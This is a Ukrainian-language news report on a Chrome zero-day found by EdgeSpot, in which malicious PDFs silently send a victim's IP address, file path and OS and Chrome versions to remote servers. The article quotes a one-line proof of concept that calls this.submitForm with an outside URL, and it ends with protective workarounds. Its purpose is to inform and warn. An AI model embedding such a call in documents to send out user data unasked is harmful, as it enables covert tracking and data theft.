Служба виявлення експлуатування EdgeSpot виявила інтригуючу вразливість Chrome із нульовим днем, використовуючи PDF-документи. Уразливість дозволяє зловмисникам збирати конфіденційні дані за допомогою шкідливих документів PDF, відкритих у Chrome.

Як тільки жертва відкриває відповідні файли PDF у Google Chrome, шкідлива програма починає працювати у фоновому режимі, збираючи дані користувачів.

Далі дані передаються на віддалений сервер, який контролюється хакерами. Вам може бути цікаво, які дані зловмисники висмоктують, вони орієнтуються на такі дані на вашому ПК:

• IP-адреса
• Повний шлях PDF-файлу до системи
• Версії ОС та Chrome

Слідкуйте за файлами PDF, заповненими шкідливими програмами

Ви можете бути здивовані, дізнавшись, що нічого не відбувається, коли Adobe Reader використовується для відкриття PDF-файлів. Крім того, HTTP POST-запити використовуються для передачі даних на віддалені сервери без будь-якого втручання користувача.

Експерти помітили, що один з двох доменів readnotifycom або burpcollaboratornet отримував дані.

Можна уявити інтенсивність атаки, враховуючи той факт, що більшість антивірусних програм не в змозі виявити зразки, виявлені EdgeSpot.

Експерти виявляють, що зловмисники використовують API Javascript PDF "this.submitForm ()" для збору конфіденційної інформації користувачів.

Ми перевірили його за допомогою мінімального PoC, простий виклик API, наприклад "this.submitForm (" http://google.com/test ")", змусить Google Chrome надсилати особисті дані на google.com.

Фахівці фактично з’ясували, що ця помилка Chrome експлуатується двома різними наборами шкідливих PDF-файлів. Обидва вони були розповсюджені відповідно у жовтні 2017 року та вересні 2018 року.

Зокрема, зібрані дані можуть використовуватись зловмисниками для точного налаштування атак у майбутньому. Звіти передбачають, що перша партія файлів була складена за допомогою служби відстеження PDF ReadNotify.

Користувачі можуть використовувати сервіс для відстеження переглядів користувачів. EdgeSpot не поділився жодними деталями щодо характеру другого набору файлів PDF.

Як залишатися захищеним

Служба виявлення Exploit EdgeSpot хотіла попередити користувачів Chrome про потенційні ризики, оскільки не очікується, що патч вийде найближчим часом.

У минулому році EdgeSpot повідомив Google про вразливість, і компанія пообіцяла випустити патч наприкінці квітня. Н

проте ви можете скористатися тимчасовим вирішенням проблеми, локально переглянувши отримані документи PDF за допомогою альтернативної програми для читання PDF.

Крім того, ви також можете відкрити свої документи PDF в Chrome, від’єднавши свої системи від Інтернету. Тим часом ви можете дочекатися оновлення Chrome 74, яке, як очікується, відбудеться 23 квітня.